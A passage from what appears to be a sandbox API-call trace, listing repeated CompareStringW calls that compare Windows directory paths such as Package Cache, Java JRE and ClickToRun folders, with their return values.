lpString2="C:\\ProgramData\\USOShared\\Logs\\", cchCount2=30) returned 1 [0259.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\USOShared\\Logs\\", cchCount1=30, lpString2="C:\\ProgramData\\USOShared\\Logs\\", cchCount2=30) returned 2 [0259.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\", cchCount1=68, lpString2="C:\\ProgramData\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\", cchCount2=68) returned 1 [0259.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\", cchCount1=112, lpString2="C:\\ProgramData\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\", cchCount2=68) returned 3 [0259.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\", cchCount1=109, lpString2="C:\\ProgramData\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\", cchCount2=68) returned 3 [0259.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\", cchCount1=112, lpString2="C:\\ProgramData\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\", cchCount2=68) returned 3 [0259.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\", cchCount1=68, lpString2="C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchCount2=109) returned 3 [0259.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount1=43, lpString2="C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchCount2=109) returned 1 [0259.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Oracle\\Java\\javapath_target_5923062\\", cchCount1=51, lpString2="C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchCount2=109) returned 1 [0259.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\", cchCount1=114, lpString2="C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchCount2=109) returned 3 [0259.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchCount1=109, lpString2="C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchCount2=109) returned 2 [0259.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\", cchCount1=68, lpString2="C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\", cchCount2=109) returned 1 [0259.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\", cchCount1=112, lpString2="C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\", cchCount2=109) returned 3 [0259.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\", cchCount1=109, lpString2="C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\", cchCount2=109) returned 1 [0259.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\", cchCount1=111, lpString2="C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\", cchCount2=109) returned 1 [0259.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\", cchCount1=112, lpString2="C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\", cchCount2=109) returned 1 [0259.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\", cchCount1=68, lpString2="C:\\ProgramData\\regid.1991-06.com.microsoft\\", cchCount2=43) returned 1 [0259.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\", cchCount1=112, lpString2="C:\\ProgramData\\regid.1991-06.com.microsoft\\", cchCount2=43) returned 1 [0259.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\", cchCount1=115, lpString2="C:\\ProgramData\\regid.1991-06.com.microsoft\\", cchCount2=43) returned 1 [0259.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\regid.1991-06.com.microsoft\\", cchCount1=43, lpString2="C:\\ProgramData\\regid.1991-06.com.microsoft\\", cchCount2=43) returned 2 [0259.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\", cchCount1=68, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\", cchCount2=86) returned 1 [0259.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\", cchCount1=112, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\", cchCount2=86) returned 1 [0259.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\", cchCount1=115, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\", cchCount2=86) returned 1 [0259.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\regid.1991-06.com.microsoft\\", cchCount1=43, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\", cchCount2=86) returned 1 [0259.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\USOShared\\Logs\\", cchCount1=30, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\", cchCount2=86) returned 1 [0259.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\", cchCount1=112, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\", cchCount2=86) returned 1 [0259.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\", cchCount1=68, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\", cchCount2=86) returned 1 [0259.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\", cchCount1=68, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\", cchCount2=86) returned 1 [0259.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\USOShared\\Logs\\", cchCount1=30, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\", cchCount2=86) returned 1 [0259.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\", cchCount1=86, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\", cchCount2=86) returned 1 [0259.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\", cchCount1=112, lpString2="C:\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\", cchCount2=109) returned 1 [0259.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\", cchCount1=68, lpString2="C:\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\", cchCount2=109) returned 3 [0259.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\", cchCount1=111, lpString2="C:\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\", cchCount2=109) returned 3 [0259.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\", cchCount1=114, lpString2="C:\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\", cchCount2=109) returned 1 [0259.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\", cchCount1=109, lpString2="C:\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\", cchCount2=109) returned 2 [0259.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\", cchCount1=112, lpString2="C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\", cchCount2=111) returned 1 [0259.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\", cchCount1=68, lpString2="C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\", cchCount2=111) returned 1 [0259.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\regid.1991-06.com.microsoft\\", cchCount1=43, lpString2="C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\", cchCount2=111) returned 3 [0259.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\", cchCount1=115, lpString2="C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\", cchCount2=111) returned 3 [0259.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\", cchCount1=111, lpString2="C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\", cchCount2=111) returned 2 [0259.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\", cchCount1=112, lpString2="C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\", cchCount2=112) returned 2 [0259.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\", cchCount1=112, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 3 [0259.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Adobe\\ARM\\Reader_17.012.20098\\", cchCount1=45, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 3 [0259.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\gmp-clearkey\\0.1\\", cchCount1=56, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 1 [0259.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount1=39, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 2 [0259.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\", cchCount1=112, lpString2="C:\\ProgramData\\USOShared\\Logs\\", cchCount2=30) returned 1 [0259.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\", cchCount1=68, lpString2="C:\\ProgramData\\USOShared\\Logs\\", cchCount2=30) returned 1 [0259.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\regid.1991-06.com.microsoft\\", cchCount1=43, lpString2="C:\\ProgramData\\USOShared\\Logs\\", cchCount2=30) returned 1 [0259.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\", cchCount1=86, lpString2="C:\\ProgramData\\USOShared\\Logs\\", cchCount2=30) returned 3 [0259.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\USOShared\\Logs\\", cchCount1=30, lpString2="C:\\ProgramData\\USOShared\\Logs\\", cchCount2=30) returned 2 [0259.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\", cchCount1=112, lpString2="C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\", cchCount2=112) returned 1 [0259.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\", cchCount1=68, lpString2="C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\", cchCount2=112) returned 3 [0259.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\", cchCount1=111, lpString2="C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\", cchCount2=112) returned 1 [0259.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\", cchCount1=109, lpString2="C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\", cchCount2=112) returned 3 [0259.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\", cchCount1=112, lpString2="C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\", cchCount2=112) returned 2 [0259.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\", cchCount1=112, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\", cchCount2=50) returned 3 [0259.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Adobe\\ARM\\Reader_17.012.20098\\", cchCount1=45, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\", cchCount2=50) returned 3 [0259.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\gmp-clearkey\\0.1\\", cchCount1=56, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\", cchCount2=50) returned 1 [0259.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount1=39, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\", cchCount2=50) returned 1 [0259.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount1=43, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\", cchCount2=50) returned 1 [0259.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\", cchCount1=112, lpString2="C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\", cchCount2=68) returned 1 [0259.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\", cchCount1=68, lpString2="C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\", cchCount2=68) returned 1 [0259.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\regid.1991-06.com.microsoft\\", cchCount1=43, lpString2="C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\", cchCount2=68) returned 3 [0259.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\", cchCount1=115, lpString2="C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\", cchCount2=68) returned 1 [0259.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\", cchCount1=68, lpString2="C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\", cchCount2=68) returned 3 [0259.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\", cchCount1=112, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\", cchCount2=102) returned 1 [0259.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\", cchCount1=111, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\", cchCount2=102) returned 1 [0259.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\regid.1991-06.com.microsoft\\", cchCount1=43, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\", cchCount2=102) returned 1 [0259.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\", cchCount1=86, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\", cchCount2=102) returned 1 [0259.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\", cchCount1=86, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\", cchCount2=102) returned 1 [0259.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\", cchCount1=114, lpString2="C:\\ProgramData\\regid.1991-06.com.microsoft\\", cchCount2=43) returned 1 [0259.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\", cchCount1=115, lpString2="C:\\ProgramData\\regid.1991-06.com.microsoft\\", cchCount2=43) returned 1 [0259.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\USOShared\\Logs\\", cchCount1=30, lpString2="C:\\ProgramData\\regid.1991-06.com.microsoft\\", cchCount2=43) returned 3 [0259.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\", cchCount1=68, lpString2="C:\\ProgramData\\regid.1991-06.com.microsoft\\", cchCount2=43) returned 1 [0259.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\regid.1991-06.com.microsoft\\", cchCount1=43, lpString2="C:\\ProgramData\\regid.1991-06.com.microsoft\\", cchCount2=43) returned 2 [0259.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\", cchCount1=114, lpString2="C:\\ProgramData\\USOShared\\Logs\\", cchCount2=30) returned 1 [0259.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\", cchCount1=115, lpString2="C:\\ProgramData\\USOShared\\Logs\\", cchCount2=30) returned 1 [0259.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\USOShared\\Logs\\", cchCount1=30, lpString2="C:\\ProgramData\\USOShared\\Logs\\", cchCount2=30) returned 2 [0259.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\", cchCount1=114, lpString2="C:\\ProgramData\\USOShared\\Logs\\", cchCount2=30) returned 1 [0259.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\", cchCount1=115, lpString2="C:\\ProgramData\\USOShared\\Logs\\", cchCount2=30) returned 1 [0259.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\USOShared\\Logs\\", cchCount1=30, lpString2="C:\\ProgramData\\USOShared\\Logs\\", cchCount2=30) returned 2 [0259.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\", cchCount1=114, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\", cchCount2=102) returned 1 [0259.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\", cchCount1=115, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\", cchCount2=102) returned 1 [0259.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\USOShared\\Logs\\", cchCount1=30, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\", cchCount2=102) returned 1 [0259.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\", cchCount1=86, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\", cchCount2=102) returned 1 [0259.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All 